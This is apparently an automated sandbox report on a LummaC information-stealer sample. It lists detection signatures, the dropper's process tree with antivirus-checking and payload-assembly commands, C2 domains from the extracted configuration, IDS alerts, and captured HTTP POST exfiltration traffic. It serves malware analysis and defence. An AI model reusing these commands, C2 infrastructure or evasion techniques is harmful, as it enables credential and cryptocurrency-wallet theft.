Edit tour

Windows Analysis Report
ZTM2pfyhu3.exe

Overview

General Information

Sample name:	ZTM2pfyhu3.exe renamed because original name is a hash value
Original sample name:	d08440343dcfebe534564ab0084f5f65.exe
Analysis ID:	1581384
MD5:	d08440343dcfebe534564ab0084f5f65
SHA1:	ba168d05813a55e987178c07c1d03c24e4fe1b4e
SHA256:	794ae0a21b8b6845efc55b6afb6b8588452e12b426abf29d2d52ed66db0b175a
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Leaks process information

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

ZTM2pfyhu3.exe (PID: 5308 cmdline: "C:\Users\user\Desktop\ZTM2pfyhu3.exe" MD5: D08440343DCFEBE534564AB0084F5F65)

PasoCattle.exe (PID: 5612 cmdline: "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" MD5: A3E9A86D6EDE94C3C71D1F7EEA537766)

cmd.exe (PID: 5840 cmdline: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 408 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5652 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 5360 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5688 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5560 cmdline: cmd /c md 768400 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 4564 cmdline: extrac32 /Y /E Reflect MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 6300 cmdline: findstr /V "cocks" Articles MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 4444 cmdline: cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Climb.com (PID: 6172 cmdline: Climb.com V MD5: 62D09F076E6E0240548C2F837536A46A)

choice.exe (PID: 2860 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

Set-up.exe (PID: 2836 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 2A99036C44C996CEDEB2042D389FE23C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["hummskitnj.buzz", "cashfuzysao.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "spuriotis.click", "appliacnesot.buzz", "scentniej.buzz", "inherineau.buzz", "prisonyfork.buzz"], "Build id": "5FwhVM--lll"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: Climb.com PID: 6172	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.ZTM2pfyhu3.exe.20000.0.unpack	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x78d71d:$s1: Runner 0x78d882:$s3: RunOnStartup 0x78d731:$a1: Antis 0x78d75e:$a2: antiVM 0x78d765:$a3: antiSandbox 0x78d771:$a4: antiDebug 0x78d77b:$a5: antiEmulator 0x78d788:$a6: enablePersistence 0x78d79a:$a7: enableFakeError 0x78d8ab:$a8: DetectVirtualMachine 0x78d8d0:$a9: DetectSandboxie 0x78d8fb:$a10: DetectDebugger 0x78d90a:$a11: CheckEmulator

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5840, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5688, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:51:30.463675+0100	2028371	3	Unknown Traffic	192.168.2.5	49728	104.21.2.51	443	TCP
2024-12-27T14:51:32.505420+0100	2028371	3	Unknown Traffic	192.168.2.5	49735	104.21.2.51	443	TCP
2024-12-27T14:51:34.936347+0100	2028371	3	Unknown Traffic	192.168.2.5	49741	104.21.2.51	443	TCP
2024-12-27T14:51:37.859235+0100	2028371	3	Unknown Traffic	192.168.2.5	49747	104.21.2.51	443	TCP
2024-12-27T14:51:40.170379+0100	2028371	3	Unknown Traffic	192.168.2.5	49753	104.21.2.51	443	TCP
2024-12-27T14:51:43.085517+0100	2028371	3	Unknown Traffic	192.168.2.5	49760	104.21.2.51	443	TCP
2024-12-27T14:51:45.687411+0100	2028371	3	Unknown Traffic	192.168.2.5	49767	104.21.2.51	443	TCP
2024-12-27T14:51:48.844703+0100	2028371	3	Unknown Traffic	192.168.2.5	49775	104.21.2.51	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:51:31.199170+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49728	104.21.2.51	443	TCP
2024-12-27T14:51:33.292217+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49735	104.21.2.51	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:51:31.199170+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49728	104.21.2.51	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:51:33.292217+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49735	104.21.2.51	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:51:36.255733+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49741	104.21.2.51	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:51:45.691069+0100	2843864	1	A Network Trojan was detected	192.168.2.5	49767	104.21.2.51	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ZTM2pfyhu3.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP17352100036963	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003Q	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["hummskitnj.buzz", "cashfuzysao.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "spuriotis.click", "appliacnesot.buzz", "scentniej.buzz", "inherineau.buzz", "prisonyfork.buzz"], "Build id": "5FwhVM--lll"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: ZTM2pfyhu3.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.6% probability

Machine Learning detection for sample

Source: ZTM2pfyhu3.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: spuriotis.click
Source: 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: 5FwhVM--lll

Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_93071324-e

Source: ZTM2pfyhu3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.5:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.5:49767 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_00406301 FindFirstFileW,FindClose,	2_2_00406301
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004EDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	14_2_004EDC54
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004FA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	14_2_004FA087
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004FA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	14_2_004FA1E2
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004EE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	14_2_004EE472
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004FA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	14_2_004FA570
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004BC622 FindFirstFileExW,	14_2_004BC622
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004F66DC FindFirstFileW,FindNextFileW,FindClose,	14_2_004F66DC
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004F7333 FindFirstFileW,FindClose,	14_2_004F7333
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004F73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	14_2_004F73D4
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004ED921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	14_2_004ED921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\768400\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49728 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49728 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49741 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49735 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49767 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49735 -> 104.21.2.51:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: spuriotis.click
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 440470Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 34 38 32 37 30 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }

Source: Joe Sandbox View	IP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox View	IP Address: 34.226.108.155 34.226.108.155

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49747 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49735 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49760 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49728 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49741 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49775 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49753 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49767 -> 104.21.2.51:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LTKD0MBUJB3AVOU32NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12833Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y25C5G3CDRZKUFF8AIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15081Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RWNFFP6SKM37MQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20541Host: spuriotis.click
